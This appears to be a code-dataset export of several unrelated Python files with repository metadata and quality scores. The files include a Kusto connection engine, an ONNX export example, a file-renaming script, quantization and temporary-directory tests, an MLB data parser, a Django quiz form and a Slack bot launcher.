This internally sorts the input first, for batch processing. After obtaining stats for sorted inputs, then, this returns the stats for each sentence after recovering the original sentence order. # batch_size = 100 # 0 means w_t, -1 means w_{t-1} Run RNN on the in puts, and obtain a sequence of numpy arrays of the size [ndarray(num_layers, sequence_length, representation_dim)]. # batch_size = 100 # outputs is a list of tensors. Each tensor corresponds to one layer, and has # the size of (seq_len, batch_size, hidden_size). # (batch_size, seq_len, hidden_size), probably? # Single element list means that the only layer is the top layer. # Our LSTMs may have different hidden dim for each layer. # This method makes dimensions of all layers the same, by filling 0 # for smaller dim layer. # If dim of this layer is maximum, do nothing. # "1+c:1+c+length-1" means that index 1 is offset. Index 1 # corresponds to encoding of the first token (0 corresponds to BOS). # array = torch.cat(arrays, 0) # print(array.size()) # array = array.cpu().numpy()
2.356591
2
azure/Kqlmagic/kusto_engine.py
lupino3/jupyter-Kqlmagic
0
6627867
<reponame>lupino3/jupyter-Kqlmagic # ------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # -------------------------------------------------------------------------- from Kqlmagic.kql_engine import KqlEngine, KqlEngineError from Kqlmagic.kusto_client import Kusto_Client from Kqlmagic.constants import ConnStrKeys class KustoEngine(KqlEngine): # Constants # --------- _URI_SCHEMA_NAME = "azuredataexplorer" # no spaces, underscores, and hyphe-minus, because they are ignored in parser _ALT_URI_SCHEMA1_NAME = "adx" # no spaces, underscores, and hyphe-minus, because they are ignored in parser _ALT_URI_SCHEMA2_NAME = "ade" # no spaces, underscores, and hyphe-minus, because they are ignored in parser _ALT_URI_SCHEMA3_NAME = "kusto" # no spaces, underscores, and hyphe-minus, because they are ignored in parser _ALT_URI_SCHEMA_NAMES = [_URI_SCHEMA_NAME, _ALT_URI_SCHEMA1_NAME, _ALT_URI_SCHEMA2_NAME, _ALT_URI_SCHEMA3_NAME] _MANDATORY_KEY = ConnStrKeys.DATABASE _VALID_KEYS_COMBINATIONS = [ [ConnStrKeys.TENANT, ConnStrKeys.ANONYMOUS, ConnStrKeys.CLUSTER, ConnStrKeys.DATABASE, ConnStrKeys.ALIAS], [ConnStrKeys.TENANT, ConnStrKeys.CODE, ConnStrKeys.CLUSTER, ConnStrKeys.DATABASE, ConnStrKeys.ALIAS], [ConnStrKeys.TENANT, ConnStrKeys.USERNAME, ConnStrKeys.PASSWORD, ConnStrKeys.CLUSTER, ConnStrKeys.DATABASE, ConnStrKeys.ALIAS], [ConnStrKeys.TENANT, ConnStrKeys.CLIENTID, ConnStrKeys.CLIENTSECRET, ConnStrKeys.CLUSTER, ConnStrKeys.DATABASE, ConnStrKeys.ALIAS], [ ConnStrKeys.TENANT, ConnStrKeys.CLIENTID, ConnStrKeys.CERTIFICATE, ConnStrKeys.CERTIFICATE_THUMBPRINT, ConnStrKeys.CLUSTER, ConnStrKeys.DATABASE, ConnStrKeys.ALIAS, ], ] # Class methods # ------------- # Instance methods # ---------------- def __init__(self, conn_str, user_ns: dict, current=None, conn_class=None): super().__init__() if isinstance(conn_str, 
dict): self.conn_class = conn_class self.database_name = conn_str.get(ConnStrKeys.DATABASE) self.cluster_name = conn_str.get(ConnStrKeys.CLUSTER) self.alias = conn_str.get(ConnStrKeys.ALIAS) self.bind_url = "{0}://{1}('{2}').{3}('{4}')".format( self._URI_SCHEMA_NAME, ConnStrKeys.CLUSTER, self.cluster_name, ConnStrKeys.DATABASE, self.database_name ) else: self._parsed_conn = self._parse_common_connection_str( conn_str, current, self._URI_SCHEMA_NAME, self._MANDATORY_KEY, self._VALID_KEYS_COMBINATIONS, user_ns ) self.client = Kusto_Client(self._parsed_conn) def get_client(self): if self.client is None: cluster_connection = self.conn_class.get_connection_by_name("@" + self.cluster_name) if cluster_connection is None: raise KqlEngineError("connection to cluster not set.") return cluster_connection.get_client() else: return self.client
# ------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # -------------------------------------------------------------------------- from Kqlmagic.kql_engine import KqlEngine, KqlEngineError from Kqlmagic.kusto_client import Kusto_Client from Kqlmagic.constants import ConnStrKeys class KustoEngine(KqlEngine): # Constants # --------- _URI_SCHEMA_NAME = "azuredataexplorer" # no spaces, underscores, and hyphe-minus, because they are ignored in parser _ALT_URI_SCHEMA1_NAME = "adx" # no spaces, underscores, and hyphe-minus, because they are ignored in parser _ALT_URI_SCHEMA2_NAME = "ade" # no spaces, underscores, and hyphe-minus, because they are ignored in parser _ALT_URI_SCHEMA3_NAME = "kusto" # no spaces, underscores, and hyphe-minus, because they are ignored in parser _ALT_URI_SCHEMA_NAMES = [_URI_SCHEMA_NAME, _ALT_URI_SCHEMA1_NAME, _ALT_URI_SCHEMA2_NAME, _ALT_URI_SCHEMA3_NAME] _MANDATORY_KEY = ConnStrKeys.DATABASE _VALID_KEYS_COMBINATIONS = [ [ConnStrKeys.TENANT, ConnStrKeys.ANONYMOUS, ConnStrKeys.CLUSTER, ConnStrKeys.DATABASE, ConnStrKeys.ALIAS], [ConnStrKeys.TENANT, ConnStrKeys.CODE, ConnStrKeys.CLUSTER, ConnStrKeys.DATABASE, ConnStrKeys.ALIAS], [ConnStrKeys.TENANT, ConnStrKeys.USERNAME, ConnStrKeys.PASSWORD, ConnStrKeys.CLUSTER, ConnStrKeys.DATABASE, ConnStrKeys.ALIAS], [ConnStrKeys.TENANT, ConnStrKeys.CLIENTID, ConnStrKeys.CLIENTSECRET, ConnStrKeys.CLUSTER, ConnStrKeys.DATABASE, ConnStrKeys.ALIAS], [ ConnStrKeys.TENANT, ConnStrKeys.CLIENTID, ConnStrKeys.CERTIFICATE, ConnStrKeys.CERTIFICATE_THUMBPRINT, ConnStrKeys.CLUSTER, ConnStrKeys.DATABASE, ConnStrKeys.ALIAS, ], ] # Class methods # ------------- # Instance methods # ---------------- def __init__(self, conn_str, user_ns: dict, current=None, conn_class=None): super().__init__() if isinstance(conn_str, dict): self.conn_class = conn_class 
self.database_name = conn_str.get(ConnStrKeys.DATABASE) self.cluster_name = conn_str.get(ConnStrKeys.CLUSTER) self.alias = conn_str.get(ConnStrKeys.ALIAS) self.bind_url = "{0}://{1}('{2}').{3}('{4}')".format( self._URI_SCHEMA_NAME, ConnStrKeys.CLUSTER, self.cluster_name, ConnStrKeys.DATABASE, self.database_name ) else: self._parsed_conn = self._parse_common_connection_str( conn_str, current, self._URI_SCHEMA_NAME, self._MANDATORY_KEY, self._VALID_KEYS_COMBINATIONS, user_ns ) self.client = Kusto_Client(self._parsed_conn) def get_client(self): if self.client is None: cluster_connection = self.conn_class.get_connection_by_name("@" + self.cluster_name) if cluster_connection is None: raise KqlEngineError("connection to cluster not set.") return cluster_connection.get_client() else: return self.client
en
0.662444
# ------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. # -------------------------------------------------------------------------- # Constants # --------- # no spaces, underscores, and hyphe-minus, because they are ignored in parser # no spaces, underscores, and hyphe-minus, because they are ignored in parser # no spaces, underscores, and hyphe-minus, because they are ignored in parser # no spaces, underscores, and hyphe-minus, because they are ignored in parser # Class methods # ------------- # Instance methods # ----------------
1.897387
2
src/python/nimbusml/examples/examples_from_dataframe/OnnxRunner_df.py
montehoover/NimbusML
134
6627868
import os import tempfile import numpy as np import pandas as pd from nimbusml import Pipeline from nimbusml.preprocessing import OnnxRunner from nimbusml.preprocessing.normalization import MinMaxScaler def get_tmp_file(suffix=None): fd, file_name = tempfile.mkstemp(suffix=suffix) fl = os.fdopen(fd, 'w') fl.close() return file_name # Generate the train and test data np.random.seed(0) x = np.arange(100, step=0.1) y = x * 10 + (np.random.standard_normal(len(x)) * 10) train_data = {'c1': x, 'c2': y} train_df = pd.DataFrame(train_data).astype({'c1': np.float32, 'c2': np.float32}) test_data = {'c1': [2.5, 30.5], 'c2': [1, 1]} test_df = pd.DataFrame(test_data).astype({'c1': np.float32, 'c2': np.float32}) # Fit a MinMaxScaler Pipeline r1 = Pipeline([MinMaxScaler()]) r1.fit(train_df) # Export the pipeline to ONNX onnx_path = get_tmp_file('.onnx') r1.export_to_onnx(onnx_path, 'com.microsoft.ml', onnx_version='Stable') # Perform the transform using the standard ML.Net backend result_standard = r1.transform(test_df) print(result_standard) # c1 c2 # 0 0.025025 0.000998 # 1 0.305305 0.000998 # Perform the transform using the ONNX backend. # Note, the extra columns and column name differences # is a known issue with the ML.Net backend. onnxrunner = OnnxRunner(model_file=onnx_path) result_onnx = onnxrunner.fit_transform(test_df) print(result_onnx) # c1 c2 c12.0 c22.0 # 0 2.5 1.0 0.025025 0.000998 # 1 30.5 1.0 0.305305 0.000998
import os import tempfile import numpy as np import pandas as pd from nimbusml import Pipeline from nimbusml.preprocessing import OnnxRunner from nimbusml.preprocessing.normalization import MinMaxScaler def get_tmp_file(suffix=None): fd, file_name = tempfile.mkstemp(suffix=suffix) fl = os.fdopen(fd, 'w') fl.close() return file_name # Generate the train and test data np.random.seed(0) x = np.arange(100, step=0.1) y = x * 10 + (np.random.standard_normal(len(x)) * 10) train_data = {'c1': x, 'c2': y} train_df = pd.DataFrame(train_data).astype({'c1': np.float32, 'c2': np.float32}) test_data = {'c1': [2.5, 30.5], 'c2': [1, 1]} test_df = pd.DataFrame(test_data).astype({'c1': np.float32, 'c2': np.float32}) # Fit a MinMaxScaler Pipeline r1 = Pipeline([MinMaxScaler()]) r1.fit(train_df) # Export the pipeline to ONNX onnx_path = get_tmp_file('.onnx') r1.export_to_onnx(onnx_path, 'com.microsoft.ml', onnx_version='Stable') # Perform the transform using the standard ML.Net backend result_standard = r1.transform(test_df) print(result_standard) # c1 c2 # 0 0.025025 0.000998 # 1 0.305305 0.000998 # Perform the transform using the ONNX backend. # Note, the extra columns and column name differences # is a known issue with the ML.Net backend. onnxrunner = OnnxRunner(model_file=onnx_path) result_onnx = onnxrunner.fit_transform(test_df) print(result_onnx) # c1 c2 c12.0 c22.0 # 0 2.5 1.0 0.025025 0.000998 # 1 30.5 1.0 0.305305 0.000998
en
0.665048
# Generate the train and test data # Fit a MinMaxScaler Pipeline # Export the pipeline to ONNX # Perform the transform using the standard ML.Net backend # c1 c2 # 0 0.025025 0.000998 # 1 0.305305 0.000998 # Perform the transform using the ONNX backend. # Note, the extra columns and column name differences # is a known issue with the ML.Net backend. # c1 c2 c12.0 c22.0 # 0 2.5 1.0 0.025025 0.000998 # 1 30.5 1.0 0.305305 0.000998
2.776532
3
misc/renNumPlDl.py
gxjit/PyUtils
0
6627869
import argparse import pathlib import re def parseArgs(): def dirPath(pth): pthObj = pathlib.Path(pth) if pthObj.is_dir(): return pthObj else: raise argparse.ArgumentTypeError("Invalid Directory path") parser = argparse.ArgumentParser(description="Does Stuff.") parser.add_argument("dir", metavar="DirPath", help="Directory path", type=dirPath) return parser.parse_args() dirPath = parseArgs().dir.resolve() fiveD = re.compile(r"\d{5}") for file in dirPath.iterdir(): if not file.is_file() or file.suffix != ".m4a": continue newName = file.stem for i in re.findall(fiveD, file.stem): newName = newName.replace(i, str(int(i))) # print("\n----") # print(file.stem) # print(newName) # print("----\n") file.rename(dirPath.joinpath(f"{newName}{file.suffix}"))
import argparse import pathlib import re def parseArgs(): def dirPath(pth): pthObj = pathlib.Path(pth) if pthObj.is_dir(): return pthObj else: raise argparse.ArgumentTypeError("Invalid Directory path") parser = argparse.ArgumentParser(description="Does Stuff.") parser.add_argument("dir", metavar="DirPath", help="Directory path", type=dirPath) return parser.parse_args() dirPath = parseArgs().dir.resolve() fiveD = re.compile(r"\d{5}") for file in dirPath.iterdir(): if not file.is_file() or file.suffix != ".m4a": continue newName = file.stem for i in re.findall(fiveD, file.stem): newName = newName.replace(i, str(int(i))) # print("\n----") # print(file.stem) # print(newName) # print("----\n") file.rename(dirPath.joinpath(f"{newName}{file.suffix}"))
en
0.191729
# print("\n----") # print(file.stem) # print(newName) # print("----\n")
3.304115
3
NightlyTests/torch/test_ignoring_layers_for_quantization_MNIST.py
Rohan-Chaudhury/aimet
3
6627870
# /usr/bin/env python3.5 # -*- mode: python -*- # ============================================================================= # @@-COPYRIGHT-START-@@ # # Copyright (c) 2018, Qualcomm Innovation Center, Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder nor the names of its contributors # may be used to endorse or promote products derived from this software # without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. 
# # SPDX-License-Identifier: BSD-3-Clause # # @@-COPYRIGHT-END-@@ # ============================================================================= import unittest import torch import torch.nn as nn from aimet_torch import quantizer as q from aimet_common.utils import AimetLogger import aimet_torch.examples.mnist_torch_model as mnist_model logger = AimetLogger.get_area_logger(AimetLogger.LogAreas.Test) class IgnoreLayers(unittest.TestCase): def test_quantizer_with_ignoring_layers(self): torch.cuda.empty_cache() net = mnist_model.Net() model = net.to(torch.device('cpu')) quantizer = q.Quantizer(model=model, use_cuda=False) layers_to_ignore = [net.conv1, net.fc2] quantizer.quantize_net(bw_params=8, bw_acts=8, run_model=mnist_model.evaluate, iterations=1, layers_to_ignore=layers_to_ignore) self.assertTrue(isinstance(net.conv1, nn.Conv2d)) self.assertFalse(isinstance(net.conv2, nn.Conv2d)) self.assertTrue(isinstance(net.fc2, nn.Linear)) print("Quantized Model", model)
# /usr/bin/env python3.5 # -*- mode: python -*- # ============================================================================= # @@-COPYRIGHT-START-@@ # # Copyright (c) 2018, Qualcomm Innovation Center, Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder nor the names of its contributors # may be used to endorse or promote products derived from this software # without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. 
# # SPDX-License-Identifier: BSD-3-Clause # # @@-COPYRIGHT-END-@@ # ============================================================================= import unittest import torch import torch.nn as nn from aimet_torch import quantizer as q from aimet_common.utils import AimetLogger import aimet_torch.examples.mnist_torch_model as mnist_model logger = AimetLogger.get_area_logger(AimetLogger.LogAreas.Test) class IgnoreLayers(unittest.TestCase): def test_quantizer_with_ignoring_layers(self): torch.cuda.empty_cache() net = mnist_model.Net() model = net.to(torch.device('cpu')) quantizer = q.Quantizer(model=model, use_cuda=False) layers_to_ignore = [net.conv1, net.fc2] quantizer.quantize_net(bw_params=8, bw_acts=8, run_model=mnist_model.evaluate, iterations=1, layers_to_ignore=layers_to_ignore) self.assertTrue(isinstance(net.conv1, nn.Conv2d)) self.assertFalse(isinstance(net.conv2, nn.Conv2d)) self.assertTrue(isinstance(net.fc2, nn.Linear)) print("Quantized Model", model)
en
0.667523
# /usr/bin/env python3.5 # -*- mode: python -*- # ============================================================================= # @@-COPYRIGHT-START-@@ # # Copyright (c) 2018, Qualcomm Innovation Center, Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # # 2. Redistributions in binary form must reproduce the above copyright notice, # this list of conditions and the following disclaimer in the documentation # and/or other materials provided with the distribution. # # 3. Neither the name of the copyright holder nor the names of its contributors # may be used to endorse or promote products derived from this software # without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" # AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE # IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE # ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE # LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR # CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF # SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS # INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN # CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) # ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE # POSSIBILITY OF SUCH DAMAGE. # # SPDX-License-Identifier: BSD-3-Clause # # @@-COPYRIGHT-END-@@ # =============================================================================
1.058817
1
src/parser.py
copyrosicky/MlbEngagementCompetition
7
6627871
# import ujson import json import pandas as pd from src.row import Row def _to_datetime(d): if 'date' in d: date = d['date'] else: date = d.name return pd.to_datetime(date, format='%Y%m%d').to_numpy() def parse_row(row: pd.Series): def _parse(_row, idx): if idx in _row and not pd.isnull(_row[idx]): return json.loads(_row[idx]) else: return [] return Row( date=_to_datetime(row), engagement=_parse(row, 'nextDayPlayerEngagement'), games=_parse(row, 'games'), rosters=_parse(row, 'rosters'), player_box_scores=_parse(row, 'playerBoxScores'), team_box_scores=_parse(row, 'teamBoxScores'), transactions=_parse(row, 'transactions'), standings=_parse(row, 'standings'), awards=_parse(row, 'awards'), events=_parse(row, 'events'), player_twitter_followers=_parse(row, 'playerTwitterFollowers'), team_twitter_followers=_parse(row, 'teamTwitterFollowers') ) def make_df_base_from_test(df: pd.DataFrame) -> pd.DataFrame: df = df.reset_index() df['playerId'] = df['date_playerId'].apply(lambda x: int(x.split('_')[1])) df['dailyDataDate'] = _to_datetime(df) return df[['dailyDataDate', 'date', 'playerId', 'target1', 'target2', 'target3', 'target4']].set_index('date') def make_df_base_from_train_engagement(df: pd.DataFrame) -> pd.DataFrame: df['date'] = df['dailyDataDate'] df['dailyDataDate'] = _to_datetime(df) return df[['dailyDataDate', 'date', 'playerId', 'target1', 'target2', 'target3', 'target4']].set_index('date')
# import ujson import json import pandas as pd from src.row import Row def _to_datetime(d): if 'date' in d: date = d['date'] else: date = d.name return pd.to_datetime(date, format='%Y%m%d').to_numpy() def parse_row(row: pd.Series): def _parse(_row, idx): if idx in _row and not pd.isnull(_row[idx]): return json.loads(_row[idx]) else: return [] return Row( date=_to_datetime(row), engagement=_parse(row, 'nextDayPlayerEngagement'), games=_parse(row, 'games'), rosters=_parse(row, 'rosters'), player_box_scores=_parse(row, 'playerBoxScores'), team_box_scores=_parse(row, 'teamBoxScores'), transactions=_parse(row, 'transactions'), standings=_parse(row, 'standings'), awards=_parse(row, 'awards'), events=_parse(row, 'events'), player_twitter_followers=_parse(row, 'playerTwitterFollowers'), team_twitter_followers=_parse(row, 'teamTwitterFollowers') ) def make_df_base_from_test(df: pd.DataFrame) -> pd.DataFrame: df = df.reset_index() df['playerId'] = df['date_playerId'].apply(lambda x: int(x.split('_')[1])) df['dailyDataDate'] = _to_datetime(df) return df[['dailyDataDate', 'date', 'playerId', 'target1', 'target2', 'target3', 'target4']].set_index('date') def make_df_base_from_train_engagement(df: pd.DataFrame) -> pd.DataFrame: df['date'] = df['dailyDataDate'] df['dailyDataDate'] = _to_datetime(df) return df[['dailyDataDate', 'date', 'playerId', 'target1', 'target2', 'target3', 'target4']].set_index('date')
fr
0.344587
# import ujson
2.722677
3
web/forms.py
Hedwika/Czechitas-Data-Games
1
6627872
import math from datetime import datetime from django import forms from web import models from web.models import Assignment class RightAnswer(forms.Form): answer = forms.CharField(max_length=200, label="", widget=forms.TextInput(attrs={"class": "form-control"})) assignment: models.Assignment def __init__(self, *args, **kwargs): self.assignment = kwargs.pop("assignment") super().__init__(*args, **kwargs) def clean(self): cleaned_data = super().clean() if self.assignment.answer_type == 'SEZNAM': right_answer = list(map(lambda x: x.strip(), self.assignment.right_answer.split(","))) answer = cleaned_data["answer"] if "," not in answer: raise forms.ValidationError("Odpověď musí být seznam a musí obsahovat alespoň dvě " "hodnoty oddělené čárkou.") answer = list(map(lambda x: x.strip(), answer.split(","))) if not set(right_answer) == set(answer): raise forms.ValidationError("Špatná odpověď, zkus to prosím znovu.") elif self.assignment.answer_type == 'ČÍSLO': right_answer = float(self.assignment.right_answer) answer = cleaned_data["answer"] if "," in answer: raise forms.ValidationError("Je třeba používat desetinnou tečku, nikoli desetinnou čárku.") elif not answer.replace('.', '', 1).isdigit(): raise forms.ValidationError("Odpověď musí být číslo!") else: answer = float(cleaned_data["answer"]) if round(answer, 2) != round(right_answer, 2): raise forms.ValidationError("Špatná odpověď, zkus to prosím znovu.") else: if cleaned_data["answer"] != self.assignment.right_answer: raise forms.ValidationError("Špatná odpověď, zkus to prosím znovu.") return cleaned_data
import math from datetime import datetime from django import forms from web import models from web.models import Assignment class RightAnswer(forms.Form): answer = forms.CharField(max_length=200, label="", widget=forms.TextInput(attrs={"class": "form-control"})) assignment: models.Assignment def __init__(self, *args, **kwargs): self.assignment = kwargs.pop("assignment") super().__init__(*args, **kwargs) def clean(self): cleaned_data = super().clean() if self.assignment.answer_type == 'SEZNAM': right_answer = list(map(lambda x: x.strip(), self.assignment.right_answer.split(","))) answer = cleaned_data["answer"] if "," not in answer: raise forms.ValidationError("Odpověď musí být seznam a musí obsahovat alespoň dvě " "hodnoty oddělené čárkou.") answer = list(map(lambda x: x.strip(), answer.split(","))) if not set(right_answer) == set(answer): raise forms.ValidationError("Špatná odpověď, zkus to prosím znovu.") elif self.assignment.answer_type == 'ČÍSLO': right_answer = float(self.assignment.right_answer) answer = cleaned_data["answer"] if "," in answer: raise forms.ValidationError("Je třeba používat desetinnou tečku, nikoli desetinnou čárku.") elif not answer.replace('.', '', 1).isdigit(): raise forms.ValidationError("Odpověď musí být číslo!") else: answer = float(cleaned_data["answer"]) if round(answer, 2) != round(right_answer, 2): raise forms.ValidationError("Špatná odpověď, zkus to prosím znovu.") else: if cleaned_data["answer"] != self.assignment.right_answer: raise forms.ValidationError("Špatná odpověď, zkus to prosím znovu.") return cleaned_data
none
1
2.368672
2
garbo/storage/__init__.py
natict/garbo
1
6627873
<filename>garbo/storage/__init__.py __author__ = 'nati'
<filename>garbo/storage/__init__.py __author__ = 'nati'
none
1
1.076472
1
markov_slackbot/main.py
bigshebang/clovis
0
6627874
<reponame>bigshebang/clovis # -*- coding: utf-8 -*- import json from os import path, makedirs, walk from markov_slackbot.markov_slackbot import MarkovSlackbot def markov_slackbot(config_file): """API equivalent to using markov_slackbot at the command line. :param config_file: User configuration path file. """ config = json.loads(open(config_file).read()) markov_slackbot = MarkovSlackbot(config) markov_slackbot.start() def generate_example_config_file(): """Create an example config file. """ example_config = { 'SLACK_TOKEN': 'your token <PASSWORD>', 'slack_log_dir': 'slack_logs', 'clean_chatlog_dir': 'clean_logs', 'external_texts_dir': 'external_texts', 'send_mentions': False, 'LOG_LEVEL': 'DEBUG', 'SILENT_CHANNELS_FILE': 'silent_channels.json' } example_config_json = json.dumps(example_config, sort_keys=True, indent=4) example_config_file = open('config.json.example', 'a') example_config_file.seek(0) example_config_file.truncate() example_config_file.write(example_config_json) def prepare_environment(): """Prepare the environment for the bot. """ if not path.exists('slack_logs'): makedirs('slack_logs') if not path.exists('external_texts'): makedirs('external_texts') generate_example_config_file()
# -*- coding: utf-8 -*- import json from os import path, makedirs, walk from markov_slackbot.markov_slackbot import MarkovSlackbot def markov_slackbot(config_file): """API equivalent to using markov_slackbot at the command line. :param config_file: User configuration path file. """ config = json.loads(open(config_file).read()) markov_slackbot = MarkovSlackbot(config) markov_slackbot.start() def generate_example_config_file(): """Create an example config file. """ example_config = { 'SLACK_TOKEN': 'your token <PASSWORD>', 'slack_log_dir': 'slack_logs', 'clean_chatlog_dir': 'clean_logs', 'external_texts_dir': 'external_texts', 'send_mentions': False, 'LOG_LEVEL': 'DEBUG', 'SILENT_CHANNELS_FILE': 'silent_channels.json' } example_config_json = json.dumps(example_config, sort_keys=True, indent=4) example_config_file = open('config.json.example', 'a') example_config_file.seek(0) example_config_file.truncate() example_config_file.write(example_config_json) def prepare_environment(): """Prepare the environment for the bot. """ if not path.exists('slack_logs'): makedirs('slack_logs') if not path.exists('external_texts'): makedirs('external_texts') generate_example_config_file()
en
0.677073
# -*- coding: utf-8 -*- API equivalent to using markov_slackbot at the command line. :param config_file: User configuration path file. Create an example config file. Prepare the environment for the bot.
2.791404
3
pytmpdir/DirectoryTest.py
brentonford/pytmpdir
0
6627875
<reponame>brentonford/pytmpdir # Created by Synerty Pty Ltd # Copyright (C) 2013-2017 Synerty Pty Ltd (Australia) # # This software is open source, the MIT license applies. # # Website : http://www.synerty.com # Support : <EMAIL> import os import random import string import unittest from tempfile import mkstemp from pytmpdir.Directory import Directory, FileClobberError, isWindows class DirectoryTest(unittest.TestCase): @classmethod def makeRandomContents(cls, size=100): return ''.join([random.choice(string.ascii_uppercase + string.digits) for _ in range(size)]) @classmethod def makeRandomDirectory(cls): directory = Directory() dirs = [''] def addRecursiveDirs(path): if len(dirs) > 20: return for d in range(5): newPath = os.path.join(path, cls.makeRandomContents(10)) # print "Creating new path %s" % newPath dirs.append(newPath) addRecursiveDirs(newPath) for x in range(10): f = directory.createFile(path=newPath, name=cls.makeRandomContents(10)) with f.open(write=True) as fobj: fobj.write(cls.makeRandomContents(4000)) addRecursiveDirs('') return directory # Create files with bad paths @unittest.skipUnless(isWindows, "Not Windows detected, skipping " "testCreateWindowsBadPaths.") def testCreateWindowsBadPaths(self): d = Directory() self.assertEqual(d.createFile(pathName="\\abspath\\name1").pathName, 'abspath\\name1') self.assertEqual(d.createFile(pathName="relpath\\name2").pathName, "relpath\\name2") self.assertRaises(AssertionError, d.createFile, pathName="\\abspath\\dir1\\") self.assertRaises(AssertionError, d.createFile, pathName="relpath\\dir2\\") self.assertEqual(2, len(d.files)) print("COMPLETED testCreateWindowsBadPaths") @unittest.skipIf(isWindows, "Windows detected, skipping testCreateLinuxBadPaths.") def testCreateLinuxBadPaths(self): d = Directory() self.assertEqual(d.createFile(pathName="/abspath/name1").pathName, 'abspath/name1') self.assertEqual(d.createFile(pathName="relpath/name2").pathName, "relpath/name2") self.assertRaises(AssertionError, 
d.createFile, pathName="/abspath/dir1/") self.assertRaises(AssertionError, d.createFile, pathName="relpath/dir2/") self.assertEqual(2, len(d.files)) print("COMPLETED testCreateLinuxBadPaths") def testDir(self): d = Directory() assert (os.path.isdir(d.path)) num = 10 for x in range(num): (fd, name) = mkstemp(dir=d.path) with os.fdopen(fd, 'w') as f: f.write(self.makeRandomContents()) d.scan() self.assertEqual(num, len(d.files)) for x in range(num): d.createFile(name=self.makeRandomContents(10)) d.createFile(path=self.makeRandomContents(10), name=self.makeRandomContents(10)) # Create a file that already exists d.createFile(pathName="clobber1") self.assertRaises(FileClobberError, d.createFile, pathName="clobber1") self.assertEqual(num * 3 + 1, len(d.files)) files = d.files[:] removeIndexes = list(range(0, len(files), 3)) [files[i].delete() for i in removeIndexes] self.assertEqual(len(d.files), len(files) - len(removeIndexes)) dirPath = d.path d = None self.assertFalse(os.path.isdir(dirPath)) print("COMPLETED makeRandomContents")
